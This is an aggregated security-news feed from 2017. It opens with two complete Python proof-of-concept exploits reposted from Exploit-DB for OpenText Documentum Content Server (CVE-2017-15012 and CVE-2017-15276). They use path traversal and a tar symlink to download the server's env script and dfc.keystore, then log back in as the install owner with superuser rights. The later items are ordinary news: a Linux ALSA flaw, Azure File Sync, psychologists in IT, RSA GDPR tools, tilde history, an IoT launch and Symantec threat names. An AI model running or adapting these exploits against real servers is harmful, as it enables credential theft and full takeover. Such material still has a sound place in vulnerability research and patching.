[webapps] OpenText Documentum Content Server – Arbitrary File Download Privilege Escalation

[webapps] OpenText Documentum Content Server – Arbitrary File Download Privilege Escalation

http://ift.tt/2xOJmgM

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# does not properly validate input of PUT_FILE RPC-command which allows any
# authenticated user to hijack arbitrary file from Content Server filesystem,
# because some files on Content Server filesystem are security-sensitive
# the security flaw described above leads to privilege escalation
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15012.py
# usage:
# CVE-2017-15012.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15012.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh
# Trying to find any object with content...
#     Downloading /u01/documentum/cs/shared/config/dfc.keystore
# Trying to find any object with content...
#     Trying to connect to docu72dev01:10001 as dmadmin ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# P0wned!
#
#

import socket
import sys
from os.path import basename

from dctmpy.docbaseclient import DocbaseClient, NULL_ID
from dctmpy.identity import Identity
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n\t%s host port user password" % basename(sys.argv[0])


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    admin_console = session.get_by_qualification(
        "dm_method where object_name='dm_JMSAdminConsole'")
    env_script = admin_console['method_verb']
    env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh')

    keystore_path = None
    script = str(download(session, env_script, bytearray()))
    if not script:
        print "Unable to download dm_set_server_env.sh"
        exit(1)

    for l in script.splitlines():
        if not l.startswith("DOCUMENTUM_SHARED"):
            continue
        keystore_path = l.split('=')[1]
        break

    if not keystore_path:
        print "Unable to determine DOCUMENTUM_SHARED"
        exit(1)

    keystore_path += "/config/dfc.keystore"
    keystore = str(download(session, keystore_path, bytearray()))

    if not keystore:
        print "Unable to download dfc.keystore"
        exit(1)

    (session, docbase) = create_session(
        sys.argv[1], sys.argv[2],
        session.serverconfig['r_install_owner'], "",
        identity=Identity(trusted=True, keystore=keystore))
    if is_super_user(session):
        print "P0wned!"


def download(session, path, buf):
    print "Downloading %s" % path
    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']

    session.apply(None, NULL_ID, "BEGIN_TRANS")
    store = session.get_by_qualification("dm_filestore")
    format = session.get_by_qualification("dm_format")
    remote_path = "common=/../../../../../../../../../..%s=Directory" % path
    result = session.put_file(store.object_id(), remote_path, format.object_id())
    full_size = result['FULL_CONTENT_SIZE']
    ticket = result['D_TICKET']

    content_id = session.next_id(0x06)
    obj = TypedObject(session=session)
    obj.set_string("OBJECT_TYPE", "dmr_content")
    obj.set_bool("IS_NEW_OBJECT", True)
    obj.set_int("i_vstamp", 0)
    obj.set_id("storage_id", store.object_id())
    obj.set_id("format", format.object_id())
    obj.set_int("data_ticket", ticket)
    obj.set_id("parent_id", object_id)
    if not session.save_cont_attrs(content_id, obj):
        raise RuntimeError("Unable to save content object")

    handle = session.make_puller(
        NULL_ID, store.object_id(), content_id,
        format.object_id(), ticket
    )

    if handle == 0:
        raise RuntimeError("Unable make puller")

    for chunk in session.download(handle):
        buf.extend(chunk)

    return buf


def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
            identity=identity)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                identity=identity,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification(
        "dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

[webapps] OpenText Documentum Content Server – Privilege Escalation

[webapps] OpenText Documentum Content Server – Privilege Escalation

http://ift.tt/2kW6F1V

#!/usr/bin/env python

# Opentext Documentum Content Server (formerly known as EMC Documentum Content Server)
# contains following design gap, which allows authenticated user to gain privileges
# of superuser:
#
# Content Server allows to upload content using batches (TAR archives), when unpacking
# TAR archives Content Server fails to verify contents of TAR archive which
# causes path traversal vulnerability via symlinks, because some files on Content Server
# filesystem are security-sensitive the security flaw described above leads to
# privilege escalation
#
# The PoC below demonstrates this vulnerability:
#
# MacBook-Pro:~ $ python CVE-2017-15276.py
# usage:
# OTDocumentumTarVulnerability.py host port user password
# MacBook-Pro:~ $ python CVE-2017-15276.py docu72dev01 10001 dm_bof_registry dm_bof_registry
# Trying to connect to docu72dev01:10001 as dm_bof_registry ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# Downloading /u01/documentum/cs/product/7.2/bin/dm_set_server_env.sh
# Creating malicious dmr_content object
# Trying to find any object with content...
#     Downloading /u01/documentum/cs/shared/config/dfc.keystore
# Creating malicious dmr_content object
# Trying to find any object with content...
#     Trying to connect to docu72dev01:10001 as dmadmin ...
# Connected to docu72dev01:10001, docbase: DCTM_DEV, version: 7.2.0270.0377  Linux64.Oracle
# P0wned!


import io
import socket
import sys
import tarfile

from dctmpy import NULL_ID

from dctmpy.docbaseclient import DocbaseClient
from dctmpy.identity import Identity
from dctmpy.obj.typedobject import TypedObject

CIPHERS = "ALL:aNULL:!eNULL"


def usage():
    print "usage:\n%s host port user password" % sys.argv[0]


def main():
    if len(sys.argv) != 5:
        usage()
        exit(1)

    (session, docbase) = create_session(*sys.argv[1:5])

    if is_super_user(session):
        print "Current user is a superuser, nothing to do"
        exit(1)

    admin_console = session.get_by_qualification(
        "dm_method where object_name='dm_JMSAdminConsole'")
    env_script = admin_console['method_verb']
    env_script = env_script.replace('dm_jms_admin.sh', 'dm_set_server_env.sh')

    keystore_path = None
    script = str(download(session, env_script, bytearray()))
    if not script:
        print "Unable to download dm_set_server_env.sh"
        exit(1)

    for l in script.splitlines():
        if not l.startswith("DOCUMENTUM_SHARED"):
            continue
        keystore_path = l.split('=')[1]
        break

    if not keystore_path:
        print "Unable to determine DOCUMENTUM_SHARED"
        exit(1)

    keystore_path += "/config/dfc.keystore"
    keystore = str(download(session, keystore_path, bytearray()))

    if not keystore:
        print "Unable to download dfc.keystore"
        exit(1)

    (session, docbase) = create_session(
        sys.argv[1], sys.argv[2],
        session.serverconfig['r_install_owner'], "",
        identity=Identity(trusted=True, keystore=keystore))
    if is_super_user(session):
        print "P0wned!"


def download(session, path, buf):
    print "Downloading %s" % path

    store = session.get_by_qualification("dm_store")
    format = session.get_by_qualification("dm_format where name='crtext'")

    print "Creating malicious dmr_content object"

    session.apply(None, NULL_ID, "BEGIN_TRANS")

    handle = session.make_pusher(store['r_object_id'])
    if handle < 1:
        print "Unable to create pusher"
        end_tran(session, False)
        exit(1)

    (bytes, length) = create_tar("test", path)
    b = bytearray()
    b.extend(bytes.read())

    print "Trying to find any object with content..."
    object_id = session.query(
        "SELECT FOR READ r_object_id "
        "FROM dm_sysobject WHERE r_content_size>0") \
        .next_record()['r_object_id']

    content_id = session.next_id(0x06)

    if not session.start_push(handle, content_id, format['r_object_id'], len(b)):
        print "Failed to start push"
        end_tran(session, False)
        exit(1)

    session.upload(handle, b)
    data_ticket = session.end_push_v2(handle)['DATA_TICKET']

    content = TypedObject(session=session)
    content.set_string("OBJECT_TYPE", "dmr_content")
    content.set_bool("IS_NEW_OBJECT", True)
    content.set_id("storage_id", store['r_object_id'])
    content.set_id("format", format['r_object_id'])
    content.set_int("data_ticket", data_ticket)
    content.set_int("page", 0)
    content.set_string("page_modifier", "dm_batch")
    content.set_string("full_format", format['name'])
    content.set_int("content_size", len(b))
    content.set_bool("BATCH_FLAG", True)
    content.set_bool("IS_ADDRENDITION", True)
    content.set_id("parent_id", object_id)
    if not session.save_cont_attrs(content_id, content):
        print "Failed to create content"
        end_tran(session, False)
        exit(1)

    content = session.get_by_qualification(
        "dmr_content WHERE any (parent_id='%s' "
        "AND page_modifier='%s')" % (object_id, "vuln"))

    handle = session.make_puller(
        NULL_ID, store.object_id(), content['r_object_id'],
        format.object_id(), data_ticket
    )

    if handle == 0:
        end_tran(session, False)
        raise RuntimeError("Unable make puller")

    for chunk in session.download(handle):
        buf.extend(chunk)

    end_tran(session, False)
    return buf


def create_tar(linkname, linkpath):
    bytes = io.BytesIO()
    tar = tarfile.TarFile(fileobj=bytes, mode="w", format=tarfile.GNU_FORMAT)
    add_link(tar, linkname, linkpath)
    text = io.BytesIO()
    text.write("file_name='%s'\n" % linkname)
    text.write("page_modifier='vuln'\n")
    text.write("parameters=''\n")
    tarinfo = tarfile.TarInfo("property.txt")
    tarinfo.size = text.tell()
    text.seek(0)
    tar.addfile(tarinfo, text)
    tar.close()
    length = bytes.tell()
    bytes.seek(0)
    return (bytes, length)


def add_link(tar, linkname, linkpath):
    tarinfo = tarfile.TarInfo(linkname)
    tarinfo.type = tarfile.SYMTYPE
    tarinfo.linkpath = linkpath
    tarinfo.name = linkname
    tar.addfile(tarinfo=tarinfo)


def create_session(host, port, user, pwd, identity=None):
    print "Trying to connect to %s:%s as %s ..." % \
          (host, port, user)
    session = None
    try:
        session = DocbaseClient(
            host=host, port=int(port),
            username=user, password=pwd,
            identity=identity)
    except socket.error, e:
        if e.errno == 54:
            session = DocbaseClient(
                host=host, port=int(port),
                username=user, password=pwd,
                identity=identity,
                secure=True, ciphers=CIPHERS)
        else:
            raise e
    docbase = session.docbaseconfig['object_name']
    version = session.serverconfig['r_server_version']
    print "Connected to %s:%s, docbase: %s, version: %s" % \
          (host, port, docbase, version)
    return (session, docbase)


def is_super_user(session):
    user = session.get_by_qualification("dm_user WHERE user_name=USER")
    if user['user_privileges'] == 16:
        return True
    group = session.get_by_qualification(
        "dm_group where group_name='dm_superusers' "
        "AND any i_all_users_names=USER")
    if group is not None:
        return True

    return False


def end_tran(session, commit=False):
    obj = TypedObject(session=session)
    obj.set_bool("COMMIT", commit)
    session.apply(None, NULL_ID, "END_TRANS", obj)


if __name__ == '__main__':
    main()

Security News

via Exploit-DB Updates http://ift.tt/1HHo1m3

October 17, 2017 at 02:08PM

Elevation of Privilege Flaw Impacts Linux Kernel

Elevation of Privilege Flaw Impacts Linux Kernel

http://ift.tt/2hM2ctM

The Linux kernel is susceptible to a local escalation of privilege impacting the Advanced Linux Sound Architecture (ALSA), Cisco warns.

Tracked as CVE-2017-15265, the vulnerability can be exploited by an attacker to gain elevated privileges on the targeted system. However, because the issue requires local access to the targeted system, the likelihood of a successful exploit is reduced.

“The vulnerability is due to a use-after-free memory error in the ALSA sequencer interface of the affected application. An attacker could exploit this vulnerability by running a crafted application on a targeted system. A successful exploit could allow the attacker to gain elevated privileges on the targeted system,” Cisco explains in an advisory published on Friday, October 13.

Discovered by Michael23 Yu and already confirmed by Kernel.org, the bug starts with a potential race window that opens when creating and deleting a port via ioctl.

The issue is that snd_seq_create_port() creates the port object and returns its pointer, but can be deleted immediately by another thread because it doesn’t take the refcount. snd_seq_ioctl_create_port() still calls for snd_seq_system_client_ev_port_start() with the created port object being deleted, thus triggering the use-after-free.

A patch has been already published on the ALSA project’s website: “it’s fixed simply by taking the refcount properly at snd_seq_create_port() and letting the caller unref the object after use.  Also, there is another potential use-after-free by sprintf() call in snd_seq_create_port(), and this is moved inside the lock.”

Related: Two-Year Old Vulnerability Patched in Linux Kernel

Related: Google Researcher Details Linux Kernel Exploit

Ionut Arghire is an international correspondent for SecurityWeek.

Previous Columns by Ionut Arghire:

Tags:

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 02:06PM

Azure File Sync links on-premises file server with cloud-based Azure Files

Azure File Sync links on-premises file server with cloud-based Azure Files

http://ift.tt/2xMH9Cu

Microsoft recently announced the public preview for Azure File Sync. This new Microsoft Azure service is meant to help users expand their on-premises file servers to Azure Files.

The general idea is that this service allows you to have a stronger connection between your cloud files and on-premises storage, making the task of managing all of those files a little more seamless. Here are some of the features and benefits that you can take advantage of with this new offering.

Mix cloud benefits with on-premises storage with Azure File Sync

In essence, Azure File Sync gives you the ability to tier files between your on-premises file server and cloud-based Azure Files. With this capability, you can keep only the newest and most recently accessed files locally while still maintaining the ability to see and access the entire namespace through seamless cloud recall. So effectively, you can transform your Windows File Server into an on-premises tier of Azure Files.

Solve global access problems

Azure File Sync also makes it easy to solve global access problems introduced by having a single point of access on-premises, or by replicating data in Azure between Azure File shares and servers in any location. A new concept that comes with Azure File Sync, called the Sync Group, lets you manage the locations that should be kept in sync with each other.

React in emergency situations

Azure File Sync also helps you keep control over your data and recover in the case of an emergency. By setting up a new Windows Server and installing Azure File Sync, the namespace is nearly instantly synced down as your cache is rebuilt. Additionally, cloud tiering moves old and infrequently accessed files to Azure, helping you make storage growth more predictable.

Azure File Sync is already available as a preview offering. Microsoft has some documentation available on its website to help users setup and configure the program.

Photo credit: Freerange Stock

The post Azure File Sync links on-premises file server with cloud-based Azure Files appeared first on TechGenix.

Security News

via Comments on: http://techgenix.com

October 17, 2017 at 01:31PM

A crazy idea: Is psychologist the next hot IT job?

A crazy idea: Is psychologist the next hot IT job?

http://ift.tt/2xLMS6F

Growing up, my siblings and I were absolutely nothing alike, nor did we become more similar to one another as adults. I was the nerdy kid who eventually went into computers and aerospace. My brother was the outdoorsy one, and my late sister was the one with all of the fancy degrees, and who eventually went on to become a mental health professional. Believe me when I say that I always assumed there was absolutely no chance that our career paths would ever cross. After all, my sister didn’t exactly have a deep understanding of the way that computers work, nor am I even remotely qualified to be prescribing Thorazine to someone who is experiencing psychotic episodes. Even so, I can’t help but wonder if we are about to see a strange career path convergence: Is psychologist the next hot IT job?

Sigmund Freud

Wikimedia

So, are future IT pros going to be required to hold a psychology degree? I have to admit that the question sounds like a bad joke. Even as I typed the question in the previous sentence, my mind instantly flashed back to the days of working helpdesk support early in my IT career, and to all of the seemingly emotionally disturbed callers who clearly “needed help.” As tempting as it may be to delve into stories of some of the stranger interactions that I have had with end users over the years, I’m not going to go there. In fact, my question over whether mental health professionals are about to be in demand in the world of IT is absolutely serious. In fact, it is already happening.

For me to be able to adequately explain why some IT shops are suddenly hiring psychologists, I have to talk a little bit about the current state of the tech industry. As you are no doubt aware, one of the biggest tech trends from four or five years ago was the so-called Big Data revolution. At the time, Big Data was really nothing more than a somewhat meaningless buzzword referring to the accumulation of large volumes of data. Over time however, the phrase “Big Data” slowly began to morph into “Big Data analytics.” Suddenly, it wasn’t so much the volume of data that really mattered, as what you could do with that data.

I have often said that the IT department’s job is to use technology to solve business problems. Big Data analytics might just be the perfect illustration of this philosophy. A company’s data is a tangible asset, and the entire science of data analytics is devoted to deriving useful, and often hidden, meanings from the data to help the business to flourish.

OK, that’s all good and well, but right about now I’m sure that you are probably wondering what any of this has to do with mental health professionals being recruited into IT positions.

Data does not lie — or does it?

next hot IT job

Back in college, I remember one of my Computer Science professors saying that data does not lie. I think that this statement was probably true at one time, but today things are different than they once were. Data might not outright lie, but it can be very misleading. This is especially true for an organization that is mining vast quantities of data in an effort to derive hidden business value.

The problem with looking for hidden meaning within a large data set is that often times it leads to the discovery of trends that are circumstantial and are not firmly based in reality. Let me give you an example.

Imagine for a moment that a particular company manufactures widgets, and that the company decides to analyze its data to try to figure out the circumstances under which customers are purchasing the widgets. After careful analysis of the data, a trend emerges that shows that on the second Tuesday of each month, customers in Kentucky and North Dakota tend to purchase blue widgets, when the color selection is more evenly distributed at all other times.

Unless the Kentucky Wildcats (whose team colors are blue and white) happen to play their games on the second Tuesday of the month, this is probably a junk statistic. The statistic might be accurate with regard to what the data is saying, but it does not reflect the nature of human behavior. I mean let’s face it: Nobody wakes up in the morning and says, “Hey, it’s the second Tuesday of the month, so I better go buy a blue widget.” The trend might exist, but it is probably a coincidence. If additional data is allowed to accumulate over a longer period of time, then the data would probably show that widget color selection on a particular day of the month is actually random.

Being too focused

Even though this particular example is made up, it is loosely based on a real-world situation that I recently heard about. In the real story, the data scientists who were working for a particular company kept finding trends within the data that didn’t really coincide with the way that things work in the real world. This isn’t to say that the data scientists were stupid. I’m sure that they were all intelligent people. It’s just that when you are studying data, it is possible to become so focused on the data itself, it is easy to forget that the data corresponds to events taking place outside of the datacenter.

The problem with this, of course, is that no company performs Big Data analytics just for the fun of it. The ultimate goal is to be able to use the data, and the trends that have been derived from that data to make better business decisions. So with that in mind, imagine what would happen if the company from my previous example decided to manufacture a bunch of extra blue widgets and ship them off to Kentucky and North Dakota. That would probably prove to be a bad business decision. The trend that was spotted within the data was based on a coincidence, and does not reflect a repeatable pattern of behavior. As such, a company that tries to capitalize on this trend would most likely be stuck with an oversupply of blue widgets that nobody is buying.

Recently, I have actually heard of a couple of companies hiring psychologists as a part of their data analytics teams. Although the psychologists might not have a background in data analytics, they do have a background in human behavior, and may therefore be able to help the data scientists to better distinguish between an actual business trend and a junk statistic. In some cases, psychologists may even be able to help the data scientists figure out what sorts of data patterns they should be looking for.

New way of doing things

In my opinion, the most interesting thing about IT shops beginning to hire psychologists is that it reflects a new way of doing things. Although saying this might be taken as heresy, I think that the successful use of psychologists on data analytics teams clearly demonstrates that there is a place for nontechnical people in IT. Don’t get me wrong, I would never condone bringing some random person in off the street and letting them run the entire datacenter. However, I wholeheartedly believe that IT can benefit from bringing in people with specialized skill sets that don’t necessarily mesh with traditional IT shops. It will be really interesting to see the direction that IT goes from here.

Photo credit: Pixabay

The post A crazy idea: Is psychologist the next hot IT job? appeared first on TechGenix.

Security News

via Comments on: http://techgenix.com

October 17, 2017 at 01:31PM

RSA Unveils New GDPR Compliance Offerings

RSA Unveils New GDPR Compliance Offerings

http://ift.tt/2xM5vHw

RSA Says GDPR is More About Evidence-based Process Than Technology

Europe’s General Data Protection Regulation (GDPR) is, by name, just another information security compliance regulation requiring that organizations protect personal data from being stolen by hackers. As such, there should be little for organizations to do since most companies already do all they can to defend against breaches (albeit not always successfully). That, however, would be a total misunderstanding of this new regulation.

The emphasis on data protection has changed: it is traditionally designed to protect data from criminals; but this regulation is designed to protect data for the user. It is a subtle change with huge ramifications, because now users are in charge of their own personal information. They must explicitly agree to the collection of data for a specific purpose; and they can withdraw consent and require companies to delete that data.

RSA LogoThis simple change means that data governance is now front and center, side-by-side with data security. Organizations will need to be able to prove user agreement to the collection of personal data; and must be able to demonstrate deletion of that data after demand. This also means that organizations must be aware of the location of all personal data at all times.

GDPR is not just about technology,” Rashmi Knowles, RSA Field CTO EMEA told SecurityWeek. “I think the bigger part of GDPR is to do with process, and the process burden is going to be huge. One of the big new things is the whole personal data lifecycle  — from getting consent and proving user consent, to processing user data and then deleting that data after processing it solely for the purpose for which it was collected; and being able to delete it at any time on the users’ request. Although some organizations already do that, a lot of companies don’t do it very well, and don’t have the evidence to prove they are doing it. GDPR is very much evidence based.”

There is another major change. Sanctions for non-compliance have been dramatically increased. While large corporations could simply accept the minimal fines from the existing Directive-based European laws as part of acceptable risk tolerance; under the Regulation fines are now geared, potentially, to seriously affect the bottom-line of non-compliant companies for many years. The regulators are taking GDPR very seriously, and they expect organizations to do the same. There is the implication that these regulators will not back away from imposing very heavy fines  for the worst cases of non-compliance.

It is against the background of GDPR being as much about data governance as it is about information security that RSA has today beefed up its Archer governance suite specifically to aid compliance with the governance side — and more — of GDPR. “Ultimately,” it says in a statement released today, “GDPR is not just a Governance, Risk and Compliance (GRC) issue. GDPR spans the full enterprise and forces companies to adopt a healthier privacy and security risk posture in four critical areas: Risk Assessment, Breach Readiness, Data Governance, and Compliance Management.”

It is in these four areas that Archer, combined with RSA NetWitness and the RSA Data Risk and Security Practice can aid GDPR compliance. On risk assessment, RSA suggests that Archer’s components will help accelerate the identification of the linkage between risks and internal controls, potentially reduce the GDPR compliance gaps and improve risk mitigation strategies.

On breach response, GDPR requires that regulators are notified of a breach generally within 72 hours of the company becoming aware of the breach. Here, RSA says its NetWitness product will scan the entire network infrastructure looking for indications of a compromise. It uses, explains RSA, “behavioral analysis and machine learning to help better understand the scope and nature of a breach with improved visibility into the attack sequence, enabling faster notification.”

RSA offers its SecurID suite and Data Risk and Security Practice service to cover the mainstream governance side of GDPR. Compliance is no longer a destination, but a continuing state, it suggests. While under earlier European laws, companies needed only worry about compliance if they were breached, with GDPR they can be found non-compliant in data governance areas at any time. This suite of services helps an organization optimize a GRC program; put in place the processes to enable a prompt response to cyber incidents; prepare to meet the new 72-hour notification requirements; and plan and implement GDPR-compliant data access programs.

“Organizations will “see quicker reaction to emerging issues, create a more proactive and resilient environment, and reduce the churn in driving accountability towards GDPR compliance,” says RSA.

But while GDPR may be more about process and evidence, the technology side cannot be ignored. The term ‘breach’ is given a wider than usual scope under GDPR. “A breach in GDPR could be lack of availability,” Knowles told SecurityWeek; “so a successful DDoS — which may not usually be classed as a breach — could be classed as a breach in GDPR terms if users lose access to their data.” 

In this sense, being struck by something like ransomware would prove a double-whammy. Firstly the victim gets all the disruption and cost of the ransomware, but secondly it is potentially and automatically in breach of GDPR. “If you can show that you are doing the right things, that you have the right controls in place,” says Knowles, “then the regulators are more likely to be lenient from the GDPR perspective. But on the other hand, if the ransomware could have been stopped had you applied the correct patches, the regulator might not be so lenient.”

GDPR compliance is a complex mix of security technology to protect the data, tied together with governance processes to manage the personal data lifecycle, backed up by the availability of continuous evidence to prove that you are doing the right things at all times.

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Previous Columns by Kevin Townsend:

Tags:

Security News

via SecurityWeek RSS Feed http://ift.tt/T5XpCH

October 17, 2017 at 01:22PM

Why Does ~ Represent the Home Folder on macOS and Linux?

Why Does ~ Represent the Home Folder on macOS and Linux?

http://ift.tt/2hMwa0S

Whether you’ve installed the Linux subsystem on Windows 10 or are getting started using the Linux Terminal, there are all kinds of shorthands you need to learn…none of which are intuitive.

For example there’s the tilde, ~, which represents your home folder. Typing cd ~/Documents switches to the Documents folder in the current user’s home directory, saving me from having to type /Users/justinpot/Documents every time. It’s a convenient shortcut, sure, but why is that particular character used for this?

Believe it or not, it’s because of a keyboard from the 1970s. Here’s a Lear Siegler ADM-3A terminal, first shipped in 1975.

This was a “dumb terminal,” meaning it wasn’t a computer in itself, but instead allowed you to input commands to and display data from a computer. The ADM-3A cost only $995, which believe it or not was a good price at the time, meaning institutions could purchase several such terminals to connect to one central computer. To this day, modern “terminal emulators,” such as those used in Linux and macOS, mimic functionality from such systems.

It’s a hugely influential piece of hardware; a lot of early software development happened on it, meaning the keyboard layout influenced a few design choices. Check it out:

Notice anything? Here’s a clearer image.

See the key at top-right? That’s the HOME key, which acts similarly to the Home key on modern keyboards, bringing the cursor to the top-left position while editing text. It’s also the key used for the tilde symbol: ~. That association was enough for ~ to eventually represent home folders.

That’s right: a specific keyboard from over forty years ago is why Linux and UNIX-based systems use ~ to represent home, even though the ~ and Home keys couldn’t be further apart on most modern keyboards. Weird, right?

And there are other details hidden in this keyboard. See the arrows on the H, J, K, and L keys? Holding Control and pressing those keys is how you moved the cursor in Terminal, which is why those same keys are used to move the cursor in vi. Those vi keyboard shortcuts, in turn, inspired the keyboard shortcuts in Gmail, Twitter and even Facebook. That’s right: even Facebook’s keyboard shortcuts were inspired by a “dumb terminal” first sold in 1975.

Look some more and you’ll notice see a few keys you don’t recognize at all. There’s the “Here Is” key, which blogger Dave Cheney explains here. Basically, it confirmed who you are over the network. You’ll also see that the Escape key is places where Caps Lock is on modern keyboards, which kind of puts the MacBook touch bar Escape key controversy in a new light. I’m sure there’s many other details I’m missing.

A device you’ve never heard of influenced design decisions used in software people still use over forty years later. Isn’t history weird?

Image Credits: Chris Jacobs, StuartBrady, Eric Fischer

Security News

via How-To Geek http://ift.tt/2f5IBTe

October 17, 2017 at 01:18PM

Actility accelerating the Internet of Things in China – IoT Business News (press release) (blog)

Actility accelerating the Internet of Things in China – IoT Business News (press release) (blog)

http://ift.tt/2x1Wmel

Actility accelerating the Internet of Things in China

ThingPark China Market will give Chinese IoT solution sellers access to both Chinese B2B customers and the global ThingPark Market audience.

ThingPark China, a leading LPWA IoT platform and solutions development provider, announced today the opening of an IoT Ecosystem Lab in Beijing enabling device makers, application providers and customers to connect, test and evaluate their IoT solutions with its localized ThingPark LoRaWAN SaaS platform.

ThingPark China is also opening its online Marketplace to IoT devices and solutions providers in China. ThingPark China Market will enable Chinese IoT devices and application sellers to accelerate the monetization of their IoT solutions with business customers in China, and also to benefit from the global audience and IoT sales opportunities enabled by Actility’s ThingPark Market.

Bing Liu, CEO of ThingPark China said:

“Our Ecosystem Lab and Marketplace will help accelerate the growth of LoRaWAN-based IoT in China by supporting the local ecosystem at every stage from developing and testing their products to distributing solutions to local customers and taking them to market worldwide. We’re bringing the tried and tested solutions from Actility and adapting them to the needs of the local market.”

Chinese device makers and application developers will be able to create a free account on the ThingPark China developer SaaS platform, hosted in China, giving them access to LoRaWAN connectivity and a suite of tools and APIs, including a self-test capability, to support the integration of their solution with ThingPark. A dedicated Ecosystem Lab facility in Beijing will provide a location with LoRaWAN coverage. Within the facility, developers will be able to use the self-testing tools for devices using the Chinese LoRaWAN frequency bands, and also prepare for international distribution by testing against European, APAC and US channel plans.

For customers who prefer to develop and test in their own location, ThingPark China will offer a Developer Kit and gateway pre-configured to connect remotely to the ThingPark China developer platform.

Along with support for developers to create their products, the opening of the ThingPark China Market will provide the opportunity for them to sell local-market IoT products to business customers in China with a user experience optimized for Chinese buyers, and also to sign up to the international ThingPark Market, through which they can sell IoT devices and solutions for any region to customers around the globe, who will be able to buy them in almost 30 different local currencies.

“Here at the LoRa Alliance All-Members Meeting, we can see how quickly the interest and commitment to LoRaWAN is growing in China,” says Bing Liu, “and we’d like to extend an invitation to any company that is interested in adopting, developing and marketing LoRaWAN products globally to join our ecosystem, make use of our lab facilities, developer kits or online tools and sign up for our Market to accelerate their progress in bringing their solution to this dynamic and fast-growing market.”

Security News,IoT News

via IoT – Google News http://ift.tt/2pYPKZV

October 17, 2017 at 01:15PM

Exp.CVE-2017-11292

Exp.CVE-2017-11292

http://ift.tt/2kUdDVm

Risikostufe: Sehr niedrig. Typ: Trojan.

Security News

via Bedrohungen RSS Feed – Symantec Corporation http://ift.tt/2wNeX07

October 17, 2017 at 01:06PM

JS.Downloader!gen27

JS.Downloader!gen27

http://ift.tt/2yrKTWY

Risikostufe: Sehr niedrig. Typ: Trojan.

Security News

via Bedrohungen RSS Feed – Symantec Corporation http://ift.tt/2wNeX07

October 17, 2017 at 01:06PM